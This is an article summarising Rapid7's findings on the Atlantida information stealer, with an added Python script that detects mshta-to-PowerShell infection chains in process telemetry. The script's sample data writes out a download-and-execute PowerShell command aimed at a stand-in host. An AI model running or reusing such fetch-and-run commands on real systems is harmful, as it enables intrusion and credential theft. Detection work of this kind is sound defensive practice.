Security researchers at Rapid7 recently identified a new information-stealing malware called Atlantida. The stealer lures users into downloading a malicious file from a compromised website and uses evasion techniques such as reflective loading and process injection before it activates. Its primary objective is to steal a wide range of sensitive information: login credentials for popular applications such as Telegram and Steam, data from offline cryptocurrency wallets and browser-extension wallets, screenshots of the victim's screen, and hardware information about the victim's machine.
The attack begins with the victim manually executing a deceptive .hta file downloaded from a compromised website. The file contains a Visual Basic Script (VBScript) that decrypts and executes a base64-encoded payload, starting a chain of stealthy operations. The malware uses a three-stage loading process: a PowerShell script first downloads and executes further malicious scripts in memory, one of which is a .NET downloader, which in turn retrieves a Donut injector, a tool designed to execute various file types in memory without writing them to disk.
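The delivery chain above (an .hta opened by mshta.exe, which spawns PowerShell with an encoded command that pulls the next stage into memory) leaves a recognisable parent/child pattern in process-creation telemetry. The following is an added detection example, not code from Rapid7's report or from the malware: it runs over a few constructed Sysmon-style process-creation records, decodes any `-EncodedCommand` argument, and flags mshta.exe-to-powershell.exe chains whose decoded command contains download-and-execute indicators. The event format, process IDs, file names and host name are all constructed for illustration.

```python
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record, reduced to the fields the check needs (constructed format)."""
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


# Matches -e / -ec / -enc / -EncodedCommand followed by a base64 blob (PowerShell accepts prefixes).
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Substrings that, in a decoded PowerShell command, indicate fetching and running code in memory.
IN_MEMORY_INDICATORS = (
    "downloadstring", "downloaddata", "invoke-expression", "iex ",
    "frombase64string", "reflection.assembly",
)

# Constructed second-stage command line, mirroring the "download and run in memory" step.
STAGE2_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not real telemetry); PIDs and paths are arbitrary.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Users\victim\Downloads\invoice.hta"'),
    ProcEvent(300, 200, POWERSHELL,
              "powershell.exe -nop -w hidden -enc "
              + base64.b64encode(STAGE2_CMD.encode("utf-16le")).decode()),
    ProcEvent(400, 100, r"C:\Windows\System32\notepad.exe", "notepad.exe readme.txt"),
    ProcEvent(500, 100, POWERSHELL, r"powershell.exe -File C:\scripts\backup.ps1"),
]


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE plaintext of an encoded-command argument, or None if absent or invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_suspicious_chains(events):
    """Flag powershell.exe processes whose parent is mshta.exe running an .hta file.

    Each finding records the decoded command (if any) and which in-memory indicators it contains.
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if basename(e.image) != "powershell.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or basename(parent.image) != "mshta.exe":
            continue
        if ".hta" not in parent.cmdline.lower():
            continue
        decoded = decode_encoded_command(e.cmdline)
        indicators = [i for i in IN_MEMORY_INDICATORS if decoded and i in decoded.lower()]
        findings.append({
            "parent_pid": parent.pid,
            "child_pid": e.pid,
            "hta_cmdline": parent.cmdline,
            "decoded_command": decoded,
            "indicators": indicators,
        })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_chains(SAMPLE_EVENTS):
        print(f"mshta pid {f['parent_pid']} -> powershell pid {f['child_pid']}: {f['indicators']}")
        print("  decoded:", f["decoded_command"])
```

The check keys on the parent/child relationship rather than on any file hash, so it survives the per-campaign changes to the .hta and scripts that the text describes; the decoded command is kept in the finding so an analyst can see the download URL and the next-stage location without re-running the sample. The benign PowerShell launched from explorer.exe with `-File` is not flagged, since it has neither the mshta.exe parent nor an encoded command.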
Ultimately the Atlantida stealer, named for a string found in its executable, is loaded. The stealer captures the entire screen contents but also targets specific data sources: it searches for files belonging to FileZilla, an open-source FTP client, and looks for offline cryptocurrency wallets, harvesting data from both. It also collects detailed hardware information from the victim's device and targets specific directories for further data extraction.
A distinctive aspect of Atlantida is its focus on certain web browsers (Google Chrome, Mozilla Firefox, and Microsoft Edge) and its ability to steal information from Chrome-based browser extensions. The stolen data is compiled, compressed, and then transmitted to a command-and-control (C2) server.
Atlantida’s sophisticated multi-stage attack, targeted data theft, and evasion techniques mark it as a significant threat in the realm of cybersecurity, requiring vigilant awareness and advanced protective measures.